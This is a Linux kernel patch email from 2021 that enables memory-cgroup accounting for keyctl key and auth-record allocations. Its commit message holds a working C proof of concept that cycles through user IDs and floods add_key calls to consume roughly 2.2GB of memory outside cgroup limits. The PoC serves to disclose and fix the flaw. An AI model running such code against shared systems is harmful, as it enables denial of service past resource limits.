From patchwork Mon Jul 19 08:17:47 2021
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Yutian Yang <nglaive@gmail.com>
X-Patchwork-Id: 12384987
Return-Path: <SRS0=zvni=ML=kvack.org=owner-linux-mm@kernel.org>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
X-Spam-Level: 
X-Spam-Status: No, score=-15.7 required=3.0 tests=BAYES_00,DKIM_SIGNED,
	DKIM_VALID,DKIM_VALID_AU,FREEMAIL_FORGED_FROMDOMAIN,FREEMAIL_FROM,
	HEADER_FROM_DIFFERENT_DOMAINS,INCLUDES_CR_TRAILER,INCLUDES_PATCH,
	MAILING_LIST_MULTI,SPF_HELO_NONE,SPF_PASS,USER_AGENT_GIT autolearn=ham
	autolearn_force=no version=3.4.0
Received: from mail.kernel.org (mail.kernel.org [198.145.29.99])
	by smtp.lore.kernel.org (Postfix) with ESMTP id DA532C12002
	for <linux-mm@archiver.kernel.org>; Mon, 19 Jul 2021 08:18:03 +0000 (UTC)
Received: from kanga.kvack.org (kanga.kvack.org [205.233.56.17])
	by mail.kernel.org (Postfix) with ESMTP id 72D33611AF
	for <linux-mm@archiver.kernel.org>; Mon, 19 Jul 2021 08:18:03 +0000 (UTC)
DMARC-Filter: OpenDMARC Filter v1.3.2 mail.kernel.org 72D33611AF
Authentication-Results: mail.kernel.org;
 dmarc=fail (p=none dis=none) header.from=gmail.com
Authentication-Results: mail.kernel.org;
 spf=pass smtp.mailfrom=owner-linux-mm@kvack.org
Received: by kanga.kvack.org (Postfix)
	id 061708D00F4; Mon, 19 Jul 2021 04:18:04 -0400 (EDT)
Received: by kanga.kvack.org (Postfix, from userid 40)
	id 0383A8D00EC; Mon, 19 Jul 2021 04:18:03 -0400 (EDT)
X-Delivered-To: int-list-linux-mm@kvack.org
Received: by kanga.kvack.org (Postfix, from userid 63042)
	id E1AFF8D00F4; Mon, 19 Jul 2021 04:18:03 -0400 (EDT)
X-Delivered-To: linux-mm@kvack.org
Received: from forelay.hostedemail.com (smtprelay0113.hostedemail.com
 [216.40.44.113])
	by kanga.kvack.org (Postfix) with ESMTP id B8E888D00EC
	for <linux-mm@kvack.org>; Mon, 19 Jul 2021 04:18:03 -0400 (EDT)
Received: from smtpin33.hostedemail.com (10.5.19.251.rfc1918.com
 [10.5.19.251])
	by forelay05.hostedemail.com (Postfix) with ESMTP id 4EB6D1834732D
	for <linux-mm@kvack.org>; Mon, 19 Jul 2021 08:18:02 +0000 (UTC)
X-FDA: 78378634404.33.90F0FFC
Received: from mail-pj1-f51.google.com (mail-pj1-f51.google.com
 [209.85.216.51])
	by imf04.hostedemail.com (Postfix) with ESMTP id 1515150000A0
	for <linux-mm@kvack.org>; Mon, 19 Jul 2021 08:18:01 +0000 (UTC)
Received: by mail-pj1-f51.google.com with SMTP id
 me13-20020a17090b17cdb0290173bac8b9c9so13649390pjb.3
        for <linux-mm@kvack.org>; Mon, 19 Jul 2021 01:18:01 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=20161025;
        h=from:to:cc:subject:date:message-id;
        bh=K5p2P65+i0AweYuQiub8/5cfx7UmoYj8p7cwzEMV0lA=;
        b=mqvhVWGbyd07WM7+503sKbpv85x3i1UGUD9R4uaoA+lOdh75nu3Iyh7XRPbrDit0ED
         cUJ1W5evqyynyTzM/e/me/MIk4b1n1QGZldsIMjor+iHcvGjV9e3Q2O+lahXAdwG+5bM
         GGof7BwxTVnVor7FeV1Gq3Ytfcuc2nKtyb0gWBR3/+0yMAqPHhx6yD/4wRSplbLwrbHu
         IIOkq2sDJQwhLMhdW6oJo6He/h1fRNJef068oNTRNfBFDnEBWHkA45f5SoqhR7gCqmt4
         X89TnEP64tNr4si2FcuTBg6wjZTHfayl6rRaT6OJPQy8/O7NrkL3rMv1nTbCrF2sMR0a
         2s/A==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20161025;
        h=x-gm-message-state:from:to:cc:subject:date:message-id;
        bh=K5p2P65+i0AweYuQiub8/5cfx7UmoYj8p7cwzEMV0lA=;
        b=BNc1ls0idaHHVEqoFghqjNrqsBktZrBFTi+a2uMRxAIbKyvmITLKz9BAGxjodM/aJk
         Rvqe0urOI0HaJdAyGeo7nLpUCk/un8Q2wZEAXblk9Pta1v5M27etlM29qccHYdFJQ9dV
         uWAMtNaIRXJ74GIk8UasgmTj/Uc3EIC0ckzz4q47yRbZIwLCYhHCitI2YDvI2gOR6PCb
         dcQCOoi6f3f/zsCVtrXl7Meaf/FuW3HYrpEpSUXZmF9562MOAlxdMhEazvLvHcDkNaZF
         YZ677QRyFc/Fd9xlMeeOSTYQo1FwoSr/6hTP011jlTFJY63z9w/hzdBRj5ltmM5YdTdW
         eY/w==
X-Gm-Message-State: AOAM532MioLMvweyvO/FeETFt/SR+zmrgya8K3gqozd8i+hR3TkZn0lz
	JCxp3lAfLIGaXac8QqDa2vo=
X-Google-Smtp-Source: 
 ABdhPJwKDzS/MakDwUq1pJi6jRa3rOuOd6E5xqWWgYfoMYcnYqsNMbGcM1qinHnnzvdhPSbgulAGDw==
X-Received: by 2002:a17:90b:806:: with SMTP id
 bk6mr24297010pjb.13.1626682680800;
        Mon, 19 Jul 2021 01:18:00 -0700 (PDT)
Received: from honest-machine-1.localdomain.localdomain
 (80.251.213.191.16clouds.com. [80.251.213.191])
        by smtp.gmail.com with ESMTPSA id
 u24sm19373612pfm.156.2021.07.19.01.17.59
        (version=TLS1_2 cipher=ECDHE-ECDSA-AES128-GCM-SHA256 bits=128/128);
        Mon, 19 Jul 2021 01:18:00 -0700 (PDT)
From: Yutian Yang <nglaive@gmail.com>
To: shakeelb@google.com,
	dhowells@redhat.com,
	jarkko@kernel.org,
	mhocko@kernel.org
Cc: hannes@cmpxchg.org,
	vdavydov.dev@gmail.com,
	cgroups@vger.kernel.org,
	linux-mm@kvack.org,
	shenwenbo@zju.edu.cn,
	Yutian Yang <nglaive@gmail.com>
Subject: [PATCH] memcg: enable accounting in keyctl subsys
Date: Mon, 19 Jul 2021 04:17:47 -0400
Message-Id: <1626682667-10771-1-git-send-email-nglaive@gmail.com>
X-Mailer: git-send-email 1.8.3.1
Authentication-Results: imf04.hostedemail.com;
	dkim=pass header.d=gmail.com header.s=20161025 header.b=mqvhVWGb;
	spf=pass (imf04.hostedemail.com: domain of nglaive@gmail.com designates
 209.85.216.51 as permitted sender) smtp.mailfrom=nglaive@gmail.com;
	dmarc=pass (policy=none) header.from=gmail.com
X-Rspamd-Server: rspam02
X-Stat-Signature: eq1cd6qrywnraedhae8oj1ekuyfkg5ww
X-Rspamd-Queue-Id: 1515150000A0
X-HE-Tag: 1626682681-732953
X-Bogosity: Ham, tests=bogofilter, spamicity=0.000000, version=1.2.4
Sender: owner-linux-mm@kvack.org
Precedence: bulk
X-Loop: owner-majordomo@kvack.org
List-ID: <linux-mm.kvack.org>

This patch enables accounting for key objects and auth record objects.
Allocation of the objects are triggerable by syscalls from userspace.

We have written a PoC to show that the missing-charging objects lead to
breaking memcg limits. The PoC program takes around 2.2GB unaccounted
memory, while it is charged for only 24MB memory usage. We evaluate the
PoC on QEMU x86_64 v5.2.90 + Linux kernel v5.10.19 + Debian buster. All
the limitations including ulimits and sysctl variables are set as default.
Specifically, we set kernel.keys.maxbytes = 20000 and 
kernel.keys.maxkeys = 200.

/*------------------------- POC code ----------------------------*/

#include <asm/unistd.h>
#include <linux/keyctl.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <time.h>

char desc[4000];
void alloc_key_user(int id) {
  int i = 0, times = -1;
  __s32 serial = 0;
  int err = seteuid(id);
  if (err == 0)
    printf("uid allocation success on id %d!\n", id);
  else {
    printf("err reason is %s.\n", strerror(errno));
    return;
  }
  srand(time(0));
  while (serial != -1) {
    ++times;
    for (i = 0; i < 3900; ++i)
      desc[i] = rand()%255 + 1;
    desc[i] = '\0';
    serial = syscall(__NR_add_key, "user", desc, "payload",
      strlen("payload"), KEY_SPEC_SESSION_KEYRING);
  }
  printf("allocation happened %d times.\n", times);
  seteuid(0);
}

int main() {
  int loop_times = 100000;
  int start_uid = 33001;
  for (int i = 0; i < loop_times; ++i) {
    alloc_key_user(i+start_uid);
  }
  while(1);
  return 0;
}

/*-------------------------- end --------------------------------*/

Signed-off-by: Yutian Yang <nglaive@gmail.com>
Reviewed-by: Vasily Averin <vvs@openvz.org>
Acked-by: Jarkko Sakkinen <jarkko@kernel.org>
---
 security/keys/key.c              | 4 ++--
 security/keys/request_key_auth.c | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/security/keys/key.c b/security/keys/key.c
index e282c6179..925d85c2e 100644
--- a/security/keys/key.c
+++ b/security/keys/key.c
@@ -279,7 +279,7 @@ struct key *key_alloc(struct key_type *type, const char *desc,
 		goto no_memory_2;
 
 	key->index_key.desc_len = desclen;
-	key->index_key.description = kmemdup(desc, desclen + 1, GFP_KERNEL);
+	key->index_key.description = kmemdup(desc, desclen + 1, GFP_KERNEL_ACCOUNT);
 	if (!key->index_key.description)
 		goto no_memory_3;
 	key->index_key.type = type;
@@ -1198,7 +1198,7 @@ void __init key_init(void)
 {
 	/* allocate a slab in which we can store keys */
 	key_jar = kmem_cache_create("key_jar", sizeof(struct key),
-			0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, NULL);
+			0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, NULL);
 
 	/* add the special key types */
 	list_add_tail(&key_type_keyring.link, &key_types_list);
diff --git a/security/keys/request_key_auth.c b/security/keys/request_key_auth.c
index 41e973500..ed50a100a 100644
--- a/security/keys/request_key_auth.c
+++ b/security/keys/request_key_auth.c
@@ -171,10 +171,10 @@ struct key *request_key_auth_new(struct key *target, const char *op,
 	kenter("%d,", target->serial);
 
 	/* allocate a auth record */
-	rka = kzalloc(sizeof(*rka), GFP_KERNEL);
+	rka = kzalloc(sizeof(*rka), GFP_KERNEL_ACCOUNT);
 	if (!rka)
 		goto error;
-	rka->callout_info = kmemdup(callout_info, callout_len, GFP_KERNEL);
+	rka->callout_info = kmemdup(callout_info, callout_len, GFP_KERNEL_ACCOUNT);
 	if (!rka->callout_info)
 		goto error_free_rka;
 	rka->callout_len = callout_len;